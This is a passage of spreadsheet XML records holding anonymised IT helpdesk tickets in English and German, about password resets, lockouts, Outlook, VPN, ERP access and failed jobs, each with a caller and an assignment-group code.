    <s v="from: aorthyme rnsuipbk _x000a_sent: monday, august 29, 2016 8:34 pm_x000a_to: badgknqs xwelumfz_x000a_subject: company iphone_x000a__x000a_hi pollaurid,_x000a__x000a_this is regarding your mobile phone that needs to changed. _x000a_please call vendor at this number 999. _x000a_this should be the best choice to get the issue fixed._x000a__x000a_"/>
    <s v="badgknqs xwelumfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="subject: account information updated  from uperform : spam queries"/>
    <s v="subject: account information updated  from uperform : spam queries"/>
    <s v="rwyfmclk ugbvnwtq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load crm add in on outlook "/>
    <s v="unable to load crm add in on outlook "/>
    <s v="owlgqjme qhcozdfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="subject: account information updated  from uperform : spam querries"/>
    <s v="subject: account information updated  from uperform : spam queries"/>
    <s v="mhxzdygu qwdjfgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="mobile device activation company device"/>
    <s v="aylrbosw gaeycbwd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="send function is not working. (outlook 2010)"/>
    <s v="send function is not working. (outlook 2010)"/>
    <s v="xjazwpmd sjirdnam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is not working."/>
    <s v="outlook is not working."/>
    <s v="navfgybz fuavxjzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request by ughzilfm cfibdamq."/>
    <s v="password reset request by ughzilfm cfibdamq."/>
    <s v="ompeztak ilkpqtjh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="accounts erstellen bitte"/>
    <s v="von: gogtyekhan merdivan _x000a_gesendet: montag, 29. august 2016 11:45_x000a_an: ughzilfm cfibdamq_x000a_betreff: accounts erstellen bitte_x000a__x000a_hallo ,_x000a_bitte accounts erstellen fÃ¼r 3 mitarbeiter._x000a_ujtmipzv cwdzunxs, xaqzisrk ahbgjrqz, fyedqgzt jdqvuhlr._x000a_diese mitarbeiter haben noch kein anmeldeaccount._x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_b.eng. qidgvtwa qvbutayx_x000a_leitung strahlen / supervisor blasting_x000a_qidgvtwa.qvbutayx@gmail.com_x000a__x000a_geschÃ¤ftsfÃ¼hrer/managing directors:  phvkowml azbtkqwx, naruedlk mpvhakdq_x000a__x000a_sitz/registered office: germany - registergerirtcht/listed in the court register_x000a_persÃ¶nlich haftende gesellschafterin/general partner: company company beteiligungs gmbh_x000a_sitz/registered office: fÃ¼rth/bay. - registergerirtcht/listed in the court regster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s v="qidgvtwa qvbutayx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need the bex analysis add-in"/>
    <s v="need the bex analysis add-in"/>
    <s v="dslamtcb ezbmonjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="ftnijxup sbltduco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="qjiutmel fgvtxeoy"/>
    <x v="49"/>
  </r>
  <r>
    <s v="failed skype mtg."/>
    <s v="_x000d__x000a__x000d__x000a_received from: yiramdntyjqc.qtrcepsa@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a_i tried to join a s&amp;op forecasting training session today but could not see the presenter's screen. below is the link, the training has been rescheduled for this coming friday. is there anything i can check before friday to insure i don't have this problem again?_x000d__x000a_"/>
    <s v="yiramjqc qtrcepsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="adding members to shared mailbox groups"/>
    <s v="adding members to the shared mailbox group"/>
    <s v="qcehailo wqynckxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="prtgghj4k and SID_67 password reset"/>
    <s v="unable to login to prtgghj4k and SID_67 systems"/>
    <s v="qpkbiwzl urypnjvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="jusenflm sufbehom"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi not working."/>
    <s v="wifi not working."/>
    <s v="tbjcygrn megaypdn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need initial password reset for erp prtgghj4k (hr_tool) module"/>
    <s v="need initial password reset for erp prtgghj4k (hr_tool) module"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34"/>
    <s v="unable to login to erp SID_34"/>
    <s v="qtgefsdk bytvlnca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop will not turn on, either docked or un-docked while connected to ac or just on battery."/>
    <s v="laptop will not turn on, either docked or un-docked while connected to ac or just on battery."/>
    <s v="eqcudbks zbjeqruy"/>
    <x v="2"/>
  </r>
  <r>
    <s v="once external monitor is not working and the other is flickering."/>
    <s v="once external monitor is not working and the other is flickering."/>
    <s v="raosetuv hmgwrkzb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="mzqgobhv pebimhfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laufzeitfehler bei hrp (hcm production)"/>
    <s v="folgender fehler ist bei der erstellung der zeitnachweise aufgetreten: siehe anhang_x000a__x000a_alle ferienarbeiter bzw. randstad-mitarbeiter sind nur bis einschlieÃŸlich donnerstag, den 25.08.16 im system._x000a__x000a__x000a_"/>
    <s v="rayklfcm bjfwckyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook hangs."/>
    <s v="outlook hangs."/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="users in usa plant code plant_241 northgate are unable to see companyguest network."/>
    <s v="users in usa plant code plant_241 northgate are unable to see companyguest network. this is on phone as well as laptop._x000a__x000a_phone: 724"/>
    <s v="qomancfz esafqznm"/>
    <x v="3"/>
  </r>
  <r>
    <s v="dmitazhw kxbifzoh : lock out "/>
    <s v="dmitazhw kxbifzoh : lock out _x000d__x000a_mii system"/>
    <s v="epivntxc fdrxmuga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_855076"/>
    <s v="ticket update on inplant_855076"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we don't able to insert money value in crm's authorization return"/>
    <s v="we don't able to insert money value in crm's authorization return"/>
    <s v="swnjocmk etpuhnwg"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to connect to vpn."/>
    <s v="unable to connect to vpn."/>
    <s v="xwzstlgj tzkbmgan"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 issue "/>
    <s v="800_x000a_summary:need help gaining access to a query in SID_37. i can get into SID_37, i can get into be analyzer, i can find the query name i am looking for (csr quote count) but when i try to open it i get a error message that reads: a critical programdnty error has occurred. the programdnty will now terminate. i need access this week for training that i have scheduled"/>
    <s v="qnvjhgmc nicvbrzg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login help to : hub"/>
    <s v="login help to : hub"/>
    <s v="abyfsqod baezguci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please remove security role  z:comp_sales_rep from user matghyuthdw (dthyan matheywtyuews)"/>
    <s v="please remove security role  z:comp_sales_rep from user matghyuthdw (dthyan matheywtyuews). action needs to be taken immediately as it causing a security breach. please assign ticket to sudghhahjkkar reddy."/>
    <s v="aofextgk tugywidl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="reset the password for btelgpcx nrlfhbmu on erp / production / erp"/>
    <s v="reset the password for btelgpcx nrlfhbmu on erp / production / erp"/>
    <s v="btelgpcx nrlfhbmu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1294 (bia - search_server) : multiple process went down since at 8:23 am et on 08/29."/>
    <s v="search_serverrfcserver2_x000d__x000a_  search_serverindexserver_x000d__x000a_search_servernameserver_x000d__x000a_trx.erpSID_63_trx0"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="new password not updating in the windows"/>
    <s v="new password not updating in the windows"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system frozen on startup"/>
    <s v="system frozen on startup"/>
    <s v="xlvuhjea mjugvtnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view hr_tool global view and crm on collaboration_platform"/>
    <s v="unable to view hr_tool global view and crm on collaboration_platform"/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype not working"/>
    <s v="_x000a__x000a_received from: yzugpdco.nsyapewg@gmail.com_x000a__x000a_hello team,_x000a_just to inform that skype is not working from my pc_x000a__x000a__x000a_yzugpdco nsyapewg_x000a_director sales, company_x000a_europe, _x000a_yzugpdco.nsyapewg@gmail.com&lt;mailto:yzugpdco.nsyapewg@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="yzugpdco nsyapewg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hdmi cable to meeting room "/>
    <s v="_x000a__x000a_received from: inxsupmy.zhwmifvx@gmail.com_x000a__x000a_hello team ,_x000a__x000a_please arrange the hdmi cable to all the meeting room to connect the projector .since most of the new laptop are hdmi dependent where we are unable to connect via the current cable and we always depend it ,sometime it might be onsite in that case it's very difficult_x000a__x000a_inxsupmy zhwmifvx_x000a_team lead - ssl (sourcing &amp; logistics)_x000a_inxsupmy.zhwmifvx@gmail.com_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="inxsupmy zhwmifvx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vpn access"/>
    <s v="_x000a__x000a_received from: troxyekl.lzdvgwut@gmail.com_x000a__x000a_hello,_x000a__x000a_please usa access to the eu vpn for user xfuqovkd efsdciut (seefgrtybum) and atydjkwl sotmfcga (vvrtgwildj)_x000a__x000a_"/>
    <s v="troxyekl lzdvgwut"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/29/2016 08:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/29/2016 08:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to open opportunities in crm online"/>
    <s v="unable to open opportunities in crm online. user was able to do it a week back but now its showing access is denied."/>
    <s v="kzbrimwx dconpwbu"/>
    <x v="39"/>
  </r>
  <r>
    <s v="password reset : password_management_tool password manager."/>
    <s v="password reset : password_management_tool password manager."/>
    <s v="nmftrwvi rchywvmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="open order schedule lines_p2016-08-28-22-03-54"/>
    <s v="hallo ruchitgrr, hallo frau haug,_x000a__x000a_leider enthÃ¤lt dieser report nur meine tsk positionen._x000a_entsprechend der beschreibung sollte mein gesamtes verkaufsgebiet ( alle ad?) abgebildet sein_x000a__x000a_gruÃŸ_x000a__x000a_anivdcor rbmfhiox_x000a_sales manager_x000a_sales germany_x000a__x000a_anivdcor.rbmfhiox@gmail.com_x000a__x000a_company deutschland gmbh_x000a__x000a_-----ursprÃ¼ngliche nachricht-----_x000a_von: .erp-bo-publications@company.com [mailto:.erp-bo-publications@company.com]_x000a_gesendet: montag, 29. august 2016 04:58_x000a_an: anivdcor rbmfhiox &lt;anivdcor.rbmfhiox@gmail.com&gt;_x000a_betreff: open order schedule lines_p2016-08-28-22-03-54_x000a__x000a_hello._x000a__x000a_this report is your weekly open order schedule lines report.  it lists all scheduled delivery dates for open orders for your customers. _x000a__x000a_it is expected that you will use this report to effectively manage your sales territory._x000a__x000a_if you have any questions with regard to the report please contact your regional sales operational excellence lead._x000a__x000a_how to read this report_x000a_all scheduled order items are listed on the report.  the columns with the purple field names show total values for that line on the order, and should not be added together.  these total values will appear on every scheduled line.  in the example below, a line item has a total quantity ordered = 10 pieces and three scheduled deliveries of 1, 2 and 7 pieces.  the report will repeat the total quantity ordered = 10 on every schedule line:_x000a__x000a_order nbr    item nbr    create date     qty sched     value sched    date sched    unit price    qty order_x000a_blue_____    blue____    blue_______     blue_____     blue_______    blue______    blue______    purple____x000a_23456789     20          6/12/2013       1             $5             6/15/2013     $5.00         10_x000a_23456789     20          6/12/2013       2             $10            6/22/2013     $5.00         10_x000a_23456789     20          6/12/2013       7             $35            6/29/2013     $5.00         10_x000a__x000a_please do not reply directly to the sender of this mail_x000a_"/>
    <s v="anivdcor rbmfhiox"/>
    <x v="8"/>
  </r>
  <r>
    <s v="outlook inbox updating"/>
    <s v="_x000a__x000a_received from: xfdkwusj.gyklresa@gmail.com_x000a__x000a_hello_x000a_since this morning outlook is &quot;updating&quot; my inbox (see image of message)_x000a__x000a__x000a_[cid:image001.jpg@01d201ff.842dd490]_x000a__x000a_bad thing it is sucking out my bandwidth and slow my connection;_x000a_also - when i went in pasue for lunch it was at 3,6 gb left, after i returned it started again from 3,99 gbâ€¦_x000a__x000a__x000a_xfdkwusj gyklresa_x000a_sales manager earthworks european served area - south_x000a_xfdkwusj.gyklresa@gmail.com&lt;mailto:xfdkwusj.gyklresa@gmail.com&gt;_x000a__x000a__x000a_please note our new telephone number and company address effective 22.08.2016._x000a_*********************************************_x000a__x000a_company infrastructure gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq_x000a__x000a__x000a__x000a_"/>
    <s v="xfdkwusj gyklresa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad locked out"/>
    <s v="ad locked out"/>
    <s v="ecpkblrs buzgjypk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wants to log in to infonet"/>
    <s v="user wants to log in to infonet"/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no access to netweaver"/>
    <s v="when i try to connect with netweaver these 2 messages appears._x000d__x000a_1 / access way not found._x000d__x000a_2 / this don't treat properties of ''register library''."/>
    <s v="xqauilby muhkleyg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error code 0x0 when accessing user dashbankrd on mobile app"/>
    <s v="when accessing dashbankrd created for ap management team on mobile app, the above error code is encountered. see attached screenshots."/>
    <s v="cfzsajbe lyejkdho"/>
    <x v="39"/>
  </r>
  <r>
    <s v="check router wifi (router: sao-pollaurido-mercedes-ap)- site: south_amerirtca - sp - sÃ£o bernardo campo (mercedes benz)"/>
    <s v="hi team, please check the router wifi sao-pollaurido-mercedes-ap, the site company -south_amerirtca - sÃ£o pollaurido / sÃ£o bernardo campo. no is possible connect network wifi - companysecure, this network no is visible to users local. if you need connect remotely or has more doubts please, return me.. "/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="tgynoqcs uxfyzrma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 08/29/2016 07:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 08/29/2016 07:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="password unlock for venkthrysh"/>
    <s v="_x000a__x000a_received from: nmtekfrz.tjxzeuqm@gmail.com_x000a__x000a_hi,_x000a__x000a_please unlock the password for userid venkthrysh_x000a__x000a_the laptop is locked due to entering wrong password. "/>
    <s v="nmtekfrz tjxzeuqm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wendt wac 745 quattro's 5 &amp; 6 an pc bzw. server anschlieÃŸen"/>
    <s v="bitte die letzten 2 umfangsschleifmaschinen in plant_107 / ce iso g an den computer bzw. an server anschlieÃŸen, damit man sich den usb stick sparen &amp; die programdntyme direkt auf die maschine ziehen kann."/>
    <s v="ajiqfrkz dolmpkqf"/>
    <x v="41"/>
  </r>
  <r>
    <s v="printer configuration."/>
    <s v="962_x000a_summary:i want to configure printer to my laptop which is available in t1"/>
    <s v="ilypdtno mkdfetuq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the tess application on citrix does not work anymore."/>
    <s v="when i login to kas.company.com and try to start the tess app i receive the error message._x000d__x000a_i have contacted by our designes in scandinavia from the company fortive that they receive the same error message._x000d__x000a_please do the needful"/>
    <s v="oinqckds qieswrfu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="it help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: scjxobhd.ldypjkmf@gmail.com_x000d__x000a__x000d__x000a_hello help team,_x000d__x000a__x000d__x000a_can you pls. open a ticket to be assigned to fÃ¼rth._x000d__x000a_i  need help with excel and hardcopy._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="28"/>
  </r>
  <r>
    <s v="asking about cost of material of plant_82"/>
    <s v="dear it team_x000a__x000a_i have sent ticket to -erp-fico as below since last friday but i have not received ticket number yet till now. please  advise._x000a__x000a_best "/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="43"/>
  </r>
  <r>
    <s v="unable to change my telephony_software password - it has not yet expired (expires in 4 days)"/>
    <s v="please change my telephony_software interaction desktop password. i get a message that the request to change password has failed (pls see the attached screenshot)"/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="6"/>
  </r>
  <r>
    <s v="following up"/>
    <s v="hello it,_x000d__x000a__x000d__x000a_please can you block this email address in company email server.? _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="pzybmcqd fxtemlyg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connectivity issue at company carrier location"/>
    <s v="fya._x000d__x000a__x000d__x000a_best "/>
    <s v="antigvjx zekluqim"/>
    <x v="3"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="fdbgoamk hygxzkla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 08/29/2016 05:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 08/29/2016 05:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset passwords for cesgrtar abgrtyreu using password_management_tool password reset."/>
    <s v="the"/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="16"/>
  </r>
  <r>
    <s v="telefon-display"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pnroqajb.psbyfhkg@gmail.com_x000d__x000a__x000d__x000a_hallo helpteam,_x000d__x000a__x000d__x000a_das display meines telefons ist teilweise unsichtbar und somit ganz schlecht abzulesen._x000d__x000a__x000d__x000a_vielen dank!_x000d__x000a__x000d__x000a_viele grÃ¼ÃŸe / best "/>
    <s v="pnroqajb psbyfhkg"/>
    <x v="32"/>
  </r>
  <r>
    <s v="business_client issue "/>
    <s v=":+49_x000a_summary:need netweaver to check drawing documents. when opening follwing error message &quot; microsoft.net framdntyework 4.5 not installed. please contact administrator&quot;"/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="phone is not connoected wit caas server."/>
    <s v="hello;_x000a__x000a_i can't pick up the pone, this is the error message._x000a_could you help me please?._x000a__x000a_id 31751_x000a_best "/>
    <s v="ualvjicz vtywmapl"/>
    <x v="6"/>
  </r>
  <r>
    <s v="delievery item category determination"/>
    <s v="delievery item category determination for rl -0001 has to be assigned."/>
    <s v="sxkfbnaw ktbfuiah"/>
    <x v="44"/>
  </r>
  <r>
    <s v="access to common mail box"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pradtheypxsuqgidj.txlpcqsg@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am the owner of the following common mail box;_x000d__x000a__x000d__x000a_1.       -knowledge.center@kenametal.com&lt;mailto:-knowledge.center@kenametal.com&gt;_x000d__x000a__x000d__x000a_2.       w-in-knowledge.center@company.com&lt;mailto:w-in-knowledge.center@company.com&gt;_x000d__x000a__x000d__x000a_my concern today is that i am able to view w-in-knowledge.center@company.com&lt;mailto:w-in-knowledge.center@company.com&gt; but unable to view -knowledge.center@company.com&lt;mailto:-knowledge.center@company.com&gt;_x000d__x000a_pl see below the screenshot. request, pl resolve the same._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d201fe.b2f53120]_x000d__x000a__x000d__x000a_best "/>
    <s v="dgmpqzev aucvxzyp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kurtyar khty"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_please reset the password and send the new password to his manager mr. sbfhydeep kurtyar  &lt;nrbgctwm.kfwdhrmt@gmail.com&gt;_x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_manager_x000a__x000a_20293560_x000a__x000a_saoltrmy xyuscbkn_x000a__x000a_kurtyar khty_x000a__x000a_nrbgctwm kfwdhrmt_x000a__x000a__x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vvrttraja"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_mr. aetwpiox eijzadco is unable to login ess portal. please reset the password and send the new password to his manager mr. shynhjundar s  &lt;tauogwvl.xfvqakdw@gmail.com&gt;_x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_manager_x000a__x000a_202856785_x000a__x000a_aetwpiox eijzadco_x000a__x000a_vvttraja_x000a__x000a_shynhjundar s_x000a__x000a__x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn router : company-eu-deu-germany-dmvpn-1811-rtr02  down"/>
    <s v="vpn router : company-eu-deu-germany-dmvpn-1811-rtr02  down_x000d__x000a_erp is working ok_x000d__x000a_everything else is very slow."/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="7"/>
  </r>
  <r>
    <s v="urgent shipping issue."/>
    <s v="hello wohtyugang and ethryju. we have a critical situation with shipping on distributor_tool. this customer has complained before and i researched but couldn't determine a problem. we had another customer, bill north, with atnh call for 2nd time yesterday. they are saying when they choose the nda shipping the orders are changing to ups ground. i thought originally they might be setting the carrier and then selecting the ship to but as you can see if the screenshot this is not the case._x000a_i will continue to uacyltoe hxgaycze and try to determine the problem but i wanted to get this reported as quickly as possible._x000a_"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="21"/>
  </r>
  <r>
    <s v="complaint  7611183254     /  workfflow"/>
    <s v="i create a complaint  7611183254_x000d__x000a_the complaint ist not in the workflow   to approval_x000d__x000a_please help me"/>
    <s v="cdbhoxir vlpkithu"/>
    <x v="12"/>
  </r>
  <r>
    <s v="anmeldeaccount &quot;mp_ek&quot;  am pc &quot;empw8111328a:--12/13 einrichten . bei rÃ¼ckfragen durchwahl 134 bei lqjoagzt gqueiatx ."/>
    <s v="am oben genannten pc muss der anmeldename &quot;mp_ek&quot; freigegeben werden. wie mit crishtyutian pryes besprochen."/>
    <s v="lzcvymbn lqnaykvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor tauschen \htvepyua izgulrcf"/>
    <s v="monitor tauschen \htvepyua izgulrcf"/>
    <s v="htvepyua izgulrcf"/>
    <x v="24"/>
  </r>
  <r>
    <s v="customer name &quot;hronovsky&quot; does not listed in engineering tool. erp id - 8561028063."/>
    <s v="name:rekmqxfn jctgwmyi_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:rekmqxfn.jctgwmyi@gmail.com_x000a_customer number:_x000a_telephone:0042_x000a_summary:customer name &quot;hronovsky&quot; does not listed in engineering tool. erp id - 8561028063._x000a_please check and add this customer._x000a_"/>
    <s v="rekmqxfn jctgwmyi"/>
    <x v="25"/>
  </r>
  <r>
    <s v="netzwerk fÃ¼r scan nicht verfÃ¼gbar, bitte prÃ¼fen we10 und we111 \vzqomdgt jwoqbuml"/>
    <s v="netzwerk fÃ¼r scan nicht verfÃ¼gbar, bitte prÃ¼fen we10 und we111 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="zeitwirtschaft germany"/>
    <s v="seit 25.08.2016, 6.00 uhr morgens, sind fÃ¼r werk germany keine zeitbuchungen vorhanden. bitte den fehler beheben. dringend !!!!!_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_the reason of this ticket is that for germany plant (and also for germany plants)_x000d__x000a_we do not get any time â€“ account data from EU_tool transferred to erp hrp._x000d__x000a_the problem exists since aug 25!!!_x000d__x000a__x000d__x000a_it has nothing to do with today`s network problems at germany._x000d__x000a__x000d__x000a_this is serious because of month end closing on thursday._x000d__x000a__x000d__x000a_"/>
    <s v="yjofqlrx aqvxfhmn"/>
    <x v="25"/>
  </r>
  <r>
    <s v="probleme mit we_wu123 \xwirzvda okhyipgr"/>
    <s v="probleme mit we_wu123 \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit kiosk\ompeztak ilkpqtjh \bur am orde"/>
    <s v="probleme mit kiosk\ompeztak ilkpqtjh \bur am orde"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="sql installation"/>
    <s v="sql software installation"/>
    <s v="lynrwzfj fvijyeta"/>
    <x v="18"/>
  </r>
  <r>
    <s v="we 108 scannt nicht mehr "/>
    <s v="hallo ,_x000d__x000a__x000d__x000a_unser drucker we 108 scannt nicht mehr richtig ein. es kommt immer die meldung  â€žauftrag wurde nicht abgeschlossen&quot;. wenn man dann auf detail geht steht dort â€žanmelde fehler&quot;. kannst du das bitte mal Ã¼berprÃ¼fen?_x000d__x000a_am freitag ging es noch, samstag trat dann dieser fehler auf._x000d__x000a_"/>
    <s v="whykbjdq gfqlnysm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000d__x000a__x000d__x000a_enter user id of user having the issue:rethtyuzkd_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with: fb01_x000d__x000a__x000d__x000a_describe the issue:_x000d__x000a_please remove_x000d__x000a_fi:gl_accountant_ch_x000d__x000a_fi:gl_accountant_we_x000d__x000a_as per voprdmae ivrgdmao and ltnivuhw zbudwnfr user should not be able to post accounting documents. _x000d__x000a_ _x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="ipwjorsc uboapexr"/>
    <x v="19"/>
  </r>
  <r>
    <s v="reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="16"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="_x000d__x000a__x000d__x000a_received from: htburown.hpkfjqyr@gmail.com_x000d__x000a__x000d__x000a_hai ,_x000d__x000a__x000d__x000a_can you reset my passwords for all logins,_x000d__x000a__x000d__x000a_kind "/>
    <s v="htburown hpkfjqyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_895 is down since 03:04 am et on 08/29."/>
    <s v="HostName_895 is down since 03:04 am et on 08/29._x000a_the server is rebooted at 3am daily but for today after reboot the server is still down._x000a_srirgrtyam has been informed."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="help to create delivery for sto 4908050542"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to create delivery note for sto 5019161653,it's urgent for plant_305,for something error we unable to create, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot login"/>
    <s v="good morning,_x000a__x000a_we cannot login to SID_1 due the following error: _x000a_&quot;logon balancing error 88: could not connect to message server: (rc=9)_x000a_do you want to see detailed error information?&quot;_x000a__x000a_can you please check and let me know?_x000a_he error exists at least for fleisrgtyk and me (leibdrty)"/>
    <s v="fmqubnvs kcxpeyiv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user account is being locked again - zhrgtangs7"/>
    <s v="_x000a__x000a_received from: kbclinop.vsczklfp@gmail.com_x000a__x000a_hi,_x000a_user id : zhrgtangs7 account is being locked again when the computer went into screensaver._x000a__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool installation issue for distribuators"/>
    <s v="detailed description of the problem including shopfloor machine name?_x000d__x000a__x000d__x000a_sogo / engineering_tool [or other app using vlan50] location?_x000d__x000a__x000d__x000a_source ip from traffic generated?_x000d__x000a__x000d__x000a_destination ip?_x000d__x000a__x000d__x000a_type of application (eg: rdp / ping / teamviewer)?_x000d__x000a__x000d__x000a_any specific port traffic alone been blocked?_x000d__x000a__x000d__x000a_when did it work last?_x000d__x000a__x000d__x000a_is the issue specific to only the location mention or for other sogo / engineering_tool location?_x000d__x000a__x000d__x000a_additionally attach the screenshot of the ping / tracert traffic._x000d__x000a_"/>
    <s v="rsgqbuln pevsanuf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem beim skannen von unterlagen"/>
